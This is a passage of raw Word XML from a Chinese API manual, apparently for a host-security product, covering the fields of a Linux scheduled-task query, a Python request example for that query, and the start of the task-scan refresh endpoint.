      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3549AEEC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55317783" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C2C94F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB1CB0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC73BB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3982C7A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C8615C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="304BE728" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AEFB01D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0844266D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="710F2EDD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6931A037" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FDC3C51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F02BD34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17213C33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53FDA59B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E85D948" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FED88E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A904F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3060C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AEC84AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44C71A0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="253F5066" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08FC0D35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48936DEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E0840E0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EAA8C15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCCD40D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEFC911" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D0182EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E1F96CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAD7A22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>execTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3333635D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5577A7BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6B36BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行周期</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68E0180F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE8FB69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>execPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6101A2D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D00432" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453DA497" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行命令或脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="650BC707" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7807E42B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C934F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F01BE92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F8D4E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49C68C4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FDF4B16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04504D62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B55988" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23388156" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0925EFAA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61010118" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E93EC7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE400B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44FBC0F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75EA7377" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6807E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25030248" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F7B38D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35401175" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6096C7AF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E5CA4C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crondOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="032931CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E67FCA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56539C0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启用状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1377756B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E05279" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>task_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/task/linux?user=root&amp;execPath=/usr/sbin/raid-check&amp;conf=/etc/cron.d/raid-check&amp;taskTime=2017-01-25%%2000:00:00%%20-%%202017-01-27%%2000:00:00&amp;taskType=CRONTAB" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'user': 'root', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/raid-check', 'conf': '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/raid-check', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '2017-01-25 00:00:00 - 2017-01-27 00:00:00', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': 'CRONTAB'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8EC8A" w14:textId="7289A957" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372711EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc115166133"/>
      <w:bookmarkStart w:id="118" w:name="计划任务信息扫描"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r>
        <w:t>计划任务信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="70E74F84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求计划任务信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E27CE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD9C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/task/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C50A94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933CBB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
